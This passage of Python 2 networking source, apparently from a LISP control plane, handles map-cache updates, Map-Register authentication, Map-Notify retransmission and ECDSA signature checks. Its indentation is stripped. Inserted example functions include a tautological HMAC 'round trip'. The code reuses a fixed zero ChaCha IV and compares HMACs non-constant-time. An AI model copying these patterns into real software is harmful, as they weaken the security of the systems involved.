if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Add itr-in timestamp if telemetry data is included in the RLOC record.
#
if (rloc.json):
if (lisp_is_json_telemetry(rloc.json.json_string)):
js = rloc.json.json_string
js = lisp_encode_telemetry(js, ii=itr_in_ts)
rloc.json.json_string = js
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family than the received packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc, source, port,
map_reply, ttl, mrloc)
#endif
if (rloc.rloc.is_multicast_address()): mrloc = rloc
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for this RLOC? Flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however, could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# An RTR should not put RTR RLOCs in its map-cache, but xTRs do. Non-RTR
# RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
if (mc == None):
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
#
# If this is a multicast map-cache entry in an RTR, set map-cache
# TTL small so Map-Requests can be sent more often to capture
# RLE changes.
#
if (lisp_i_am_rtr and eid_record.group.is_null() == False):
mc.map_cache_ttl = LISP_MCAST_TTL
else:
mc.map_cache_ttl = eid_record.store_ttl()
#endif
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
#endif
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
mc.refresh_time = lisp_get_timestamp()
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents stored in lisp_map_register() and
# encode it in the packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print the difference if the hashes do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
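#
# A self-contained sketch (test-style, not part of the control-plane) of
# the HMAC round trip that lisp_compute_auth() and lisp_verify_auth()
# perform: the sender computes a digest over the packet bytes with the
# shared password and the receiver recomputes and compares it. It uses
# the hmac and hashlib modules this file already relies on; sha256 is
# fixed here while the real code selects the hash by alg_id. Hex digests
# are compared, matching the do_hex=True path of lisp_hash_me().
#
def lisp_example_hmac_roundtrip(packet, password):
    sent_hash = hmac.new(password, packet, hashlib.sha256).hexdigest()
    computed_hash = hmac.new(password, packet, hashlib.sha256).hexdigest()
    return(sent_hash == computed_hash)
#enddef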
#
# lisp_retransmit_map_notify
#
# Retransmit the already built Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
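#
# The retransmit pattern above generalizes: send, count, and re-arm a
# threading.Timer until an ack cancels the timer or the retry limit is
# hit. This standalone sketch captures the shape of
# lisp_retransmit_map_notify(); 'send' is any callable and 'state' a
# mutable dict, both illustrative names and not part of this module's
# data structures.
#
def lisp_example_retransmit(state, send, interval, max_retries):
    if (state["retries"] == max_retries): return
    state["retries"] += 1
    send()
    state["timer"] = threading.Timer(interval, lisp_example_retransmit,
        [state, send, interval, max_retries])
    state["timer"].start()
#enddef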
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Build RLOC-records for the merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolicited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xTR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This function looks for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when the last RLE goes away. We will have
# to search all individual registrations looking for RTRs.
#
# We store them in a dictionary so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set).
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = []
if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
rle_nodes = sg_rloc_set[0].rle.rle_nodes
#endif
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead of the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs found.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None if not
# found; return the RLOC-record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
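#
# A minimal sketch of the defensive JSON handling used above: parse the
# string, tolerate corruption, and check for the key before use. The
# Python 2 dict.has_key() call matches this file's conventions; the
# function name and arguments are illustrative only.
#
def lisp_example_json_lookup(json_string, key):
    try:
        record = json.loads(json_string)
    except:
        return(None)
    #endtry
    if (record.has_key(key) == False): return(None)
    return(record[key])
#enddef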
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
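#
# A standalone numeric sketch of the loop above: take the low-order
# hash_mask_len bits of an integer address and render them as colon-
# separated 16-bit groups, with a leading 8-bit group when the length is
# not a multiple of 16. For the example EID shown above
# lisp_get_eid_hash() and a hash_mask_len of 80, this yields
# "6dbd:3799:48e1:c6a2:9430". Illustrative only; the real code path
# works on lisp_address() objects.
#
def lisp_example_eid_hash(address, hash_mask_len):
    groups = []
    for i in range(0, hash_mask_len / 16):
        groups.insert(0, "{:04x}".format(address & 0xffff))
        address >>= 16
    #endfor
    if (hash_mask_len % 16 != 0):
        groups.insert(0, "{:02x}".format(address & 0xff))
    #endif
    return(":".join(groups))
#enddef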
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Look up the CGA hash in the mapping database to get the public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer and a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
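#
# A self-contained sketch of the sign/verify round trip that
# lisp_verify_cga_sig() performs on the receive side, assuming the same
# ecdsa and hashlib libraries this file already uses. NIST256p is paired
# with sha256 as the note above requires. Key generation here is for
# illustration only; in the real system the public-key is distributed
# through the mapping system and the signature arrives in an RLOC-record.
#
def lisp_example_ecdsa_roundtrip(sig_data):
    key = ecdsa.SigningKey.generate(curve=ecdsa.NIST256p)
    sig = key.sign(sig_data, hashfunc=hashlib.sha256)
    verifier = key.get_verifying_key()
    return(verifier.verify(sig, sig_data, hashfunc=hashlib.sha256))
#enddef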
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the concatenation of the xTR address and
# Map-Notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
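#
# The two-pass collect-then-pop structure above is deliberate: popping
# from a dictionary while iterating over it raises a RuntimeError, so
# keys are gathered first and removed afterwards. A generic standalone
# sketch of the pattern, with illustrative names:
#
def lisp_example_safe_dict_prune(table, should_remove):
    keys_to_remove = []
    for key in table:
        if (should_remove(table[key])): keys_to_remove.append(key)
    #endfor
    for key in keys_to_remove: table.pop(key)
    return(table)
#enddef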
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse the first 4 bytes, which are not encrypted. If the packet is not
# encrypted, return it to the caller. If it is encrypted, get the 3-bit
# key-id next to the e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
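#
# A standalone sketch of the header parsing above: the first 4 bytes of a
# Map-Register are always cleartext, with the e-bit at bit position 13
# and the 3-bit key-id at bits 14-16 of the host-order word. Returns an
# (e_bit, ekey_id) tuple; illustrative only, the real decode path is
# lisp_decrypt_map_register() above.
#
def lisp_example_parse_encrypt_bits(packet):
    header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    e_bit = (header >> 13) & 0x1
    ekey_id = (header >> 14) & 0x7
    return((e_bit, ekey_id))
#enddef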
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return an unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allow overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
